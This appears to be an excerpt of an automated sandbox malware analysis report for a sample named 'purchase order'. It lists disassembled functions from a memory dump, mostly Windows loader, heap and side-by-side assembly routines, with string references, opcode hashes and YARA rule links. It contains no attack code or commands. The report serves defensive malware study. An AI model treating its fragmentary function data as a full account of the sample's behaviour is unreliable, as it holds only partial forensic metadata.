                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 015D2506
                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 015D2602
                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 015D261F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                              • API String ID: 0-4009184096
                                                                                                              • Opcode ID: 0ae0e13fd3eccbf45ba68bf2baa0f833cd853e494c26c43489eca3e3483f6acc
                                                                                                              • Instruction ID: f66a457267445c4c49682fef3ae63b897e6fea6ec02a24737fdec0cc25473616
                                                                                                              • Opcode Fuzzy Hash: 0ae0e13fd3eccbf45ba68bf2baa0f833cd853e494c26c43489eca3e3483f6acc
                                                                                                              • Instruction Fuzzy Hash: 290250B1D00269ABDF31DB58CC80BDDB7B8BF54314F4445DAA609AB241EB709E84CF59
                                                                                                              Function 01608B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                              • API String ID: 0-2515994595
                                                                                                              • Opcode ID: c7a310e27649ee938b2038dbec5553259d8cfa14506201c574a2ad4c84233be3
                                                                                                              • Instruction ID: f5b214f2a96bc9df181f3beec91d5b9ad2f9dd7bb7a5825df80e2ce6215baab2
                                                                                                              • Opcode Fuzzy Hash: c7a310e27649ee938b2038dbec5553259d8cfa14506201c574a2ad4c84233be3
                                                                                                              • Instruction Fuzzy Hash: AA5190B2904306ABD72ADF188C44BABBBECFFD8750F144A1DE95587281E770D605C792
                                                                                                              Function 01610274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                              • API String ID: 0-1700792311
                                                                                                              • Opcode ID: d91af05972d6102c42d0a69a06d7df16029905ceb95adbfd9bfa5969507ba90b
                                                                                                              • Instruction ID: f551c4454a34d7c89da9273d5f80decba9e9aa153ecdd4beeddf998e50cc8200
                                                                                                              • Opcode Fuzzy Hash: d91af05972d6102c42d0a69a06d7df16029905ceb95adbfd9bfa5969507ba90b
                                                                                                              • Instruction Fuzzy Hash: BBD1BC31600686DFDF22DFA9C850AADBBF2FF8A710F08805AF9459B356D7349981CB54
                                                                                                              Function 015E89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 015E8A3D
                                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 015E8A67
                                                                                                              • VerifierDebug, xrefs: 015E8CA5
                                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 015E8B8F
                                                                                                              • HandleTraces, xrefs: 015E8C8F
                                                                                                              • VerifierFlags, xrefs: 015E8C50
                                                                                                              • VerifierDlls, xrefs: 015E8CBD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                              • API String ID: 0-3223716464
                                                                                                              • Opcode ID: ea8d844d32cb8b693de73a6d522e041ce44503ab8c7b73ac09a7d823340bd7e3
                                                                                                              • Instruction ID: aaa6eafd2f2d1a8ace67d8db0cb69db00def9d7a6fecde0b5e73291c8ff9e049
                                                                                                              • Opcode Fuzzy Hash: ea8d844d32cb8b693de73a6d522e041ce44503ab8c7b73ac09a7d823340bd7e3
                                                                                                              • Instruction Fuzzy Hash: 30911172E41712EFDB29EF28CC88B5A7BE9BB94714F444859FA466F240D770AC10C792
                                                                                                              Function 0156EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                              • API String ID: 0-1109411897
                                                                                                              • Opcode ID: ea192a164f7e6f48626815abe6dc826f5808c088efdb00ab09288ccf27c382d3
                                                                                                              • Instruction ID: e01c9f15636f0ee9fdc4b5433ad48eb1a22c6deb453ce9971dee44695c71628f
                                                                                                              • Opcode Fuzzy Hash: ea192a164f7e6f48626815abe6dc826f5808c088efdb00ab09288ccf27c382d3
                                                                                                              • Instruction Fuzzy Hash: 1DA22974E0562A8FDB64CF58CCA8BADBBB5BF45704F1442DAD909AB250DB349E81CF40
                                                                                                              Function 015963FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-792281065
                                                                                                              • Opcode ID: bf08f149f72bd4d6a3aede8637c2eb20c206829708ff27c08e2df6e1ceaec155
                                                                                                              • Instruction ID: 3602186ac8cc1510ad7b753ff8924993dc72e88fe4c22d52d2061676cf028126
                                                                                                              • Opcode Fuzzy Hash: bf08f149f72bd4d6a3aede8637c2eb20c206829708ff27c08e2df6e1ceaec155
                                                                                                              • Instruction Fuzzy Hash: 10912871B403169BEF35DFACDC89BAE7BA1FB81B24F440129E9056F681D7709801CB92
                                                                                                              Function 0155645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015B9A11, 015B9A3A
                                                                                                              • apphelp.dll, xrefs: 01556496
                                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 015B9A2A
                                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015B99ED
                                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 015B9A01
                                                                                                              • LdrpInitShimEngine, xrefs: 015B99F4, 015B9A07, 015B9A30
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-204845295
                                                                                                              • Opcode ID: 7945a0ff3773b464f59f8511815801d3860906db9d6fd35bcfd81cd2aa4a0ee8
                                                                                                              • Instruction ID: c3eaaa538e3d11ca5661a224dcd6765ead4aacf9f9f63bde68eac3df36fac901
                                                                                                              • Opcode Fuzzy Hash: 7945a0ff3773b464f59f8511815801d3860906db9d6fd35bcfd81cd2aa4a0ee8
                                                                                                              • Instruction Fuzzy Hash: 3151B1712483469FD720DF25DC91AAB7BE9FB84748F80091EFA859F250D7B0E904CB92
                                                                                                              Function 01592674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 015D2160, 015D219A, 015D21BA
                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 015D2178
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015D21BF
                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 015D219F
                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 015D2180
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 015D2165
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                              • API String ID: 0-861424205
                                                                                                              • Opcode ID: 03b7ec8ea0470f342af95fff306b3fcb5cb0e515ba67e4093f11f860e4c07235
                                                                                                              • Instruction ID: 75cee79974324997dd350cb202664a4813d0b2c2152c2cdb92b632c70fbc843d
                                                                                                              • Opcode Fuzzy Hash: 03b7ec8ea0470f342af95fff306b3fcb5cb0e515ba67e4093f11f860e4c07235
                                                                                                              • Instruction Fuzzy Hash: B731E536F40216B7FB218AAA8C45F5E7BA8FBA5A54F054059FA04BF240D7709A00C7A2
                                                                                                              Function 0159C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 015D8181, 015D81F5
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0159C6C3
                                                                                                              • LdrpInitializeImportRedirection, xrefs: 015D8177, 015D81EB
                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 015D81E5
                                                                                                              • LdrpInitializeProcess, xrefs: 0159C6C4
                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 015D8170
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 0-475462383
                                                                                                              • Opcode ID: ff57c78542e6633e31400f584dcebba0be3cc04323739506757adfdf55b9a62d
                                                                                                              • Instruction ID: 01fce0de49be0e28a4feab8a457d9fc13ed0da9f897c5081af62fa67f946c1fd
                                                                                                              • Opcode Fuzzy Hash: ff57c78542e6633e31400f584dcebba0be3cc04323739506757adfdf55b9a62d
                                                                                                              • Instruction Fuzzy Hash: 8831EE71A443179BC324EA2CDC46E2ABBE4FBD4B14F000518F985AF291E660EC04CBA2
                                                                                                              Function 015A096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 015A2DF0: LdrInitializeThunk.NTDLL ref: 015A2DFA
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015A0BA3
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015A0BB6
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015A0D60
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015A0D74
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 1404860816-0
                                                                                                              • Opcode ID: 449d9ec6cfff596bae09df2272d2392183737258430a211b35954a1481ef344a
                                                                                                              • Instruction ID: 15e405dcfca5caa4bb27654e203de6ad419217815a74df7316a65c105cfe6ec6
                                                                                                              • Opcode Fuzzy Hash: 449d9ec6cfff596bae09df2272d2392183737258430a211b35954a1481ef344a
                                                                                                              • Instruction Fuzzy Hash: E5426C71940716DFDB21CF28C880BAAB7F4BF44314F5485A9E989EF241E770AA85CF61
                                                                                                              Function 0156A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                              • API String ID: 0-379654539
                                                                                                              • Opcode ID: 6785ea7d5b22da914cc44b0933b0d498030267080a9201f9b0d0f5b55d36297e
                                                                                                              • Instruction ID: ecfde577ecb5707aaf0026a64534a08db766aed3dbf43b4b9ac5e786316ff526
                                                                                                              • Opcode Fuzzy Hash: 6785ea7d5b22da914cc44b0933b0d498030267080a9201f9b0d0f5b55d36297e
                                                                                                              • Instruction Fuzzy Hash: 38C18A74508382CFDB21CF58C440B6AB7E8BF94704F04896EF996AF251E774D949CBA2
                                                                                                              Function 01598402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01598421
                                                                                                              • LdrpInitializeProcess, xrefs: 01598422
                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0159855E
                                                                                                              • @, xrefs: 01598591
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1918872054
                                                                                                              • Opcode ID: a90dddc8adcf17f7d3feb6959b34ba1fed7744866ec9fe4fde06829e7f7935e3
                                                                                                              • Instruction ID: 88fa0bc551cba9957254db4217772810fb78d12a1bd3016c77164517fb387486
                                                                                                              • Opcode Fuzzy Hash: a90dddc8adcf17f7d3feb6959b34ba1fed7744866ec9fe4fde06829e7f7935e3
                                                                                                              • Instruction Fuzzy Hash: BD919B7155834AAFDB21DE65CC81EAFBBE8BF85744F40492EFA849A151E330D904CB63
                                                                                                              Function 0159273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015D21D9, 015D22B1
                                                                                                              • .Local, xrefs: 015928D8
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015D22B6
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 015D21DE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                              • API String ID: 0-1239276146
                                                                                                              • Opcode ID: 616aa5ee3b5e864859f68d3c1391c6fca6c5e239e30d92ae087b3d4722f42bcb
                                                                                                              • Instruction ID: b9fea343aac20a6a2f4d115c06bbf1eb9cef8040805919e99861eb171eda26d3
                                                                                                              • Opcode Fuzzy Hash: 616aa5ee3b5e864859f68d3c1391c6fca6c5e239e30d92ae087b3d4722f42bcb
                                                                                                              • Instruction Fuzzy Hash: E2A19B3190022AEBDF24CF68D884BA9B7B5BF58354F1445EAE908AF251D7309EC0CF91
                                                                                                              Function 01594AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RtlDeactivateActivationContext, xrefs: 015D3425, 015D3432, 015D3451
                                                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 015D3437
                                                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 015D3456
                                                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 015D342A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                              • API String ID: 0-1245972979
                                                                                                              • Opcode ID: 08ab6c01e4e5d51cdeb75621d4a0d3334877aab4cd8a883d4bdd615b654c5242
                                                                                                              • Instruction ID: b13c5f0a7e8d0d01593f26ce2d4b674a3e4b61e1980384ae4c540043371230da
                                                                                                              • Opcode Fuzzy Hash: 08ab6c01e4e5d51cdeb75621d4a0d3334877aab4cd8a883d4bdd615b654c5242
                                                                                                              • Instruction Fuzzy Hash: BD611076610B129FDB728F1CC945B2AB7E5BF80B60F148529E9959F240D738EC02CB92
                                                                                                              Function 015664AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 015C1028
                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015C10AE
                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 015C0FE5
                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 015C106B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                              • API String ID: 0-1468400865
                                                                                                              • Opcode ID: 5fca749158377836d745c838f3e0ca9f9ff896e59f75391ef5ebce179b6d70b1
                                                                                                              • Instruction ID: 2c60d929e372c0e62ab044792b334b0835591920fb12546b94146e03b22e1671
                                                                                                              • Opcode Fuzzy Hash: 5fca749158377836d745c838f3e0ca9f9ff896e59f75391ef5ebce179b6d70b1
                                                                                                              • Instruction Fuzzy Hash: C071C0B19043469FCB21DF54C886B9B7BACBFA5764F800469F9488F186D734D588CBD1
                                                                                                              Function 0158245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • LdrpDynamicShimModule, xrefs: 015CA998
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015CA9A2
                                                                                                              • apphelp.dll, xrefs: 01582462
                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 015CA992
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-176724104
                                                                                                              • Opcode ID: 8f2acf3290d579f6861ad2a06a0770adc53b76f7b407a2ef7f5dc74ffc578916
                                                                                                              • Instruction ID: 54f15401bd6e9788bfea56cba6a6b778369cc39488398278511792b6c03ebf24
                                                                                                              • Opcode Fuzzy Hash: 8f2acf3290d579f6861ad2a06a0770adc53b76f7b407a2ef7f5dc74ffc578916
                                                                                                              • Instruction Fuzzy Hash: B531F375A00306ABD735DF9DDC46AAABBB4FB80B44F16001DE8016F255D7B05891C790
                                                                                                              Function 015729A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • HEAP[%wZ]: , xrefs: 01573255
                                                                                                              • HEAP: , xrefs: 01573264
                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0157327D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                              • API String ID: 0-617086771
                                                                                                              • Opcode ID: 8b762902d1688e509f6f3557627457bacda01d4856573129d1a59fc6963c0890
                                                                                                              • Instruction ID: 8b2624aa579a846abfb89192f14e1c51486e56ff8840f2753e13b92f1cea2b99
                                                                                                              • Opcode Fuzzy Hash: 8b762902d1688e509f6f3557627457bacda01d4856573129d1a59fc6963c0890
                                                                                                              • Instruction Fuzzy Hash: EB92DC71A042499FDB25CF68E446BAEBBF1FF48310F188499E899AF351D334A941DF50
                                                                                                              Function 01570770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-4253913091
                                                                                                              • Opcode ID: 6d0010da3045a2f106eb79ab5aab70af392b10744fe2c9c832a442cc817e1a71
                                                                                                              • Instruction ID: 638f6f3bdd835eeb471186ec15418a719eba8cf3e7da8bc418cb31b95aff2ab9
                                                                                                              • Opcode Fuzzy Hash: 6d0010da3045a2f106eb79ab5aab70af392b10744fe2c9c832a442cc817e1a71
                                                                                                              • Instruction Fuzzy Hash: A7F18870700606DFEB25CFA8D895B6AB7F6FB85704F1485A8E5469F381E730E981CB90
                                                                                                              Function 01586962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $@
                                                                                                              • API String ID: 0-1077428164
                                                                                                              • Opcode ID: dfa3441e711f82cd0c1a5318681baa4509b2b1b14c3f672f94ec5d02913515cf
                                                                                                              • Instruction ID: c7dc522f11842aad6f0c7025c76788fb7139175987423482034f55a4aa67c69e
                                                                                                              • Opcode Fuzzy Hash: dfa3441e711f82cd0c1a5318681baa4509b2b1b14c3f672f94ec5d02913515cf
                                                                                                              • Instruction Fuzzy Hash: F2C2AC716083418FEB25DF68C881BAFBBE5BFC8714F14892DE9899B241D734D845CB62
                                                                                                              Function 0155A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                              • API String ID: 0-2779062949
                                                                                                              • Opcode ID: 73d0ab9ac6e8867e034af45e871ad5b9aad281b73ef641c9a0afa8fb1d5ac7bc
                                                                                                              • Instruction ID: ac7ffe087e84272e8ba6af4b025283e5f3cb5a140693b10e5b1bd187a0a6995f
                                                                                                              • Opcode Fuzzy Hash: 73d0ab9ac6e8867e034af45e871ad5b9aad281b73ef641c9a0afa8fb1d5ac7bc
